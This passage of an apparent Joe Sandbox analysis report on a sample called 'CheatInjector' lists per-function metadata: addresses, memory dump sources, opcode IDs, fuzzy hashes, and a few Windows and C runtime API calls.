                                                                • Instruction Fuzzy Hash: 193163B410D3809BE3209F25984179FBFE1AFD2754F04AA2CE1E95B392C7788406CB93
                                                                Function 004F8181 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6dc7c9882bccb19144ed1a0f23b88bd32bf0fefdd25a7aabb7bd94bcc0a9518f
                                                                • Instruction ID: 4b4c63c95947207d41722e4bb54fd5fcee3e6b767a013b0bc28e18c156b21db6
                                                                • Opcode Fuzzy Hash: 6dc7c9882bccb19144ed1a0f23b88bd32bf0fefdd25a7aabb7bd94bcc0a9518f
                                                                • Instruction Fuzzy Hash: 8F41D776206B858FC365CF29C190652FBF2BFA9200B588A4DC8C657B42C775F919CFA1
                                                                Function 00526DA0 Relevance: .1, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                • Instruction ID: 74a97213c8bdc7760329047628f93c77cb097c587072dce395b56e7927b6b45e
                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                • Instruction Fuzzy Hash: 8011A533B051E94EC3168D3C9410565BFA32EA3635B6983A9F4B89B2D2D623CD8A8355
                                                                Function 0051CEE0 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8dda33cc978a925e7d8c80c6a60ee8d7c2ea17c4831a2988e98abae269aaa779
                                                                • Instruction ID: 89531279be6e369ff44c686653ab749f8188a1cd0a5625dcfc89f99024d9dfb7
                                                                • Opcode Fuzzy Hash: 8dda33cc978a925e7d8c80c6a60ee8d7c2ea17c4831a2988e98abae269aaa779
                                                                • Instruction Fuzzy Hash: 1901B1F164030187E720AF55D4C577BBEAABF81708F08456CE90857602DB76EC86C6E5
                                                                Function 004F5650 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c76594d3bd56287f08ec82ab9ad40ad165dd615b5a3d31a7ee86dcc6369e99b9
                                                                • Instruction ID: 483a4b8c196f09a4b14b834ea276e5ea614b8a7441638ffaaf8cf8236edfe7fd
                                                                • Opcode Fuzzy Hash: c76594d3bd56287f08ec82ab9ad40ad165dd615b5a3d31a7ee86dcc6369e99b9
                                                                • Instruction Fuzzy Hash: 5D01443B798B0D0BA700EDB9ACC0676B697C6C5128B1E4039DA90C7311E4BCE80652E0
                                                                Function 0051AB1E Relevance: .0, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: daa1e91abda98527db5b8840d880bef4c78007133bc0a6e2d5dcd17dd22f5bce
                                                                • Instruction ID: e0ac3a532a7eaefd8e3019b5de255831693175a16d0aefe1a362f8aa17b150cd
                                                                • Opcode Fuzzy Hash: daa1e91abda98527db5b8840d880bef4c78007133bc0a6e2d5dcd17dd22f5bce
                                                                • Instruction Fuzzy Hash: 6E0128B0518341AFE374CF24C845FAABBE5BB85310F54892DB59C97291EB70A908CB52
                                                                Function 0052F6BD Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e4e38b53ea5170f5fa92de1f67e1d613dc5b5dea2e902959dc140dcbf97cd81
                                                                • Instruction ID: e01fd8dac60aa2e1ac928897100ada0b8dcb28a58b8c863d1caa700a11b9cb71
                                                                • Opcode Fuzzy Hash: 9e4e38b53ea5170f5fa92de1f67e1d613dc5b5dea2e902959dc140dcbf97cd81
                                                                • Instruction Fuzzy Hash: 54F0F038A806948BD718CF2AEC75AA67B61FB0A244F6404BDC403D7BA0CA349901CB08
                                                                Function 004FCC3F Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f2cdaf7c26b6a07021598130f2b0b426247bbb133e8d1b5b628f9002dad2c54
                                                                • Instruction ID: 88076f64a54aecdd2e92d659ac1b86af772ae7d652e1442cb3fcf183fdda63c4
                                                                • Opcode Fuzzy Hash: 7f2cdaf7c26b6a07021598130f2b0b426247bbb133e8d1b5b628f9002dad2c54
                                                                • Instruction Fuzzy Hash: 49E0173498122D8AC7249F14C9A12B3B3B1EF4B751F052496D88EABB50E37C8D80EB4D
                                                                Function 00530250 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc154bac89a4bb3ef03d7216d56e6dec2135453936a79a83cf2deb19511ae3d8
                                                                • Instruction ID: 09de906fbe5723337c524854ec582b3574c6a7dcfe03785bc195cfb4780302d4
                                                                • Opcode Fuzzy Hash: fc154bac89a4bb3ef03d7216d56e6dec2135453936a79a83cf2deb19511ae3d8
                                                                • Instruction Fuzzy Hash: BBE0923451D2809FD3481B319596A3BBBB5EB87700F11582CE0C283191E936C856CB26
                                                                Function 004D951A Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2e24c9bfb4cf332899fb73c25273ccf871f83bd892387fafdc8e73d2d010a2d
                                                                • Instruction ID: 0b1e68c9f8e3f9c5c65dc0e6126ceb128a5a8c9dd389472162a4afd7be4bc735
                                                                • Opcode Fuzzy Hash: d2e24c9bfb4cf332899fb73c25273ccf871f83bd892387fafdc8e73d2d010a2d
                                                                • Instruction Fuzzy Hash: D5E08C32911238EBCB15EB8DD964D8AF3ECEB44B14B1144ABB501D3210C674DE00C7E4
                                                                Function 0050D437 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6b5c3c64d57280fe891c3b07d29e38af95768f82d44ba8630912d3ff440bbf5
                                                                • Instruction ID: 5a5af5dbbd0b2d83edd92c1e1583ba0360c6d4f9780aa2d7e5e67f29e85ad014
                                                                • Opcode Fuzzy Hash: f6b5c3c64d57280fe891c3b07d29e38af95768f82d44ba8630912d3ff440bbf5
                                                                • Instruction Fuzzy Hash: 9BC012A6D09148CBD30367306C5617B77308813209F0950F7DD8192113E30DD40D92EF
                                                                Function 004D18CF Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f51e1fe94b134a4920c6068f11825d6fa878326ed500dc8ece34ed95d824f43
                                                                • Instruction ID: 9b8722bc633d16c3d2df7cda27649559bef3a658be2e8d936870df007a5e5482
                                                                • Opcode Fuzzy Hash: 8f51e1fe94b134a4920c6068f11825d6fa878326ed500dc8ece34ed95d824f43
                                                                • Instruction Fuzzy Hash: 6DC08C34680A00A6CE3AF91082B13A63394A392786F80048FDC028B752C61F9C82F614
                                                                Function 00513E33 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ba668ccf127641f50cee401d697d83af7cf81c3c308f888a6de969f1d8b525e
                                                                • Instruction ID: adf70165c86008a3c2b4a85857a5fc6eab2260e0a3232fae1029f8ba4c8e84c2
                                                                • Opcode Fuzzy Hash: 1ba668ccf127641f50cee401d697d83af7cf81c3c308f888a6de969f1d8b525e
                                                                • Instruction Fuzzy Hash: B2B092E9C0241CD690523B21BC064BFB0349D13308F0520B6EA0622603A71AD25A40DF
                                                                Function 0051AABE Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc1b3c558b5be003b934e83ca335c623acc0d30107a1c2ad7e7a2be11043fb82
                                                                • Instruction ID: 2dbaf51650371c6db7ca27bb32de8f592e4250d58a1a3863f910882871eea878
                                                                • Opcode Fuzzy Hash: fc1b3c558b5be003b934e83ca335c623acc0d30107a1c2ad7e7a2be11043fb82
                                                                • Instruction Fuzzy Hash: 2FB01232C4432147A1008D4140C4030D134A60B100B023364CD183370241D1FC15C0DC
                                                                Function 0051051C Relevance: .0, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 247685db0410ee32ded08beaf08efdfa973344990f30cbeaf5e1e73a63c28ffb
                                                                • Instruction ID: cb580394ee4edb242c0489d36a2639ab26eab3e0cc5161fdad0069d429ac6480
                                                                • Opcode Fuzzy Hash: 247685db0410ee32ded08beaf08efdfa973344990f30cbeaf5e1e73a63c28ffb
                                                                • Instruction Fuzzy Hash: 93B012B4C48004C7C501BF04E80543AF274DB07704F003478D048A3123D311D410868E
                                                                Function 004C6AC4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004C6ACA
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 004C6AD8
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004C6AE9
                                                                • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004C6AFA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                • API String ID: 667068680-1247241052
                                                                • Opcode ID: e104dd9bdd501f7570c5a1a08258251b6e0c817dbb0ee2351d7df9826086d0aa
                                                                • Instruction ID: 85f8031c7fe8d11f398c481f12a9443919af497ed9708af9b0b03bb8ba55ece2
                                                                • Opcode Fuzzy Hash: e104dd9bdd501f7570c5a1a08258251b6e0c817dbb0ee2351d7df9826086d0aa
                                                                • Instruction Fuzzy Hash: 64E08C359517A0ABC350AFB2BD4EAC63BA4AB9679A3100873FB02E2521D2B801048B5C
                                                                Function 004D7E8F Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3907804496
                                                                • Opcode ID: 5c0d024c990bf58d7daac8749975ea5f993fc25c6f5aaf49e334a9fbeef61633
                                                                • Instruction ID: e9cd6a63231fddb89b096a085532d3217a5c3e03c8bd2ec869b25a48c72eef91
                                                                • Opcode Fuzzy Hash: 5c0d024c990bf58d7daac8749975ea5f993fc25c6f5aaf49e334a9fbeef61633
                                                                • Instruction Fuzzy Hash: 8CB13870A04245AFDB12CF99C8A0BBEBBB5BF45314F14419FE5009B392CB789D46CB69
                                                                Function 004CA408 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • type_info::operator==.LIBVCRUNTIME ref: 004CA527
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 004CA635
                                                                • CallUnexpected.LIBVCRUNTIME ref: 004CA7A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 1206542248-393685449
                                                                • Opcode ID: 11c83b49c08216253ee330311e2f488d58ef7364b9eee0297d7535ed30e12366
                                                                • Instruction ID: f99df27e2bf2cef307f2115024f8b78a8b73f3372f4136ed14fe57ed1fea733f
                                                                • Opcode Fuzzy Hash: 11c83b49c08216253ee330311e2f488d58ef7364b9eee0297d7535ed30e12366
                                                                • Instruction Fuzzy Hash: 4DB17C7980020DEFCF55DFA5C981EAEB7B5BF04318B14416FE8016B212D739DA61CB9A
                                                                Function 004D56C6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,A585592C,?,004D57D3,?,?,00000000,00000000), ref: 004D5787
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 3664257935-537541572
                                                                • Opcode ID: f2a5f945b118a7eef67039391d814849242d98418d5026994c2356908b5acaf4
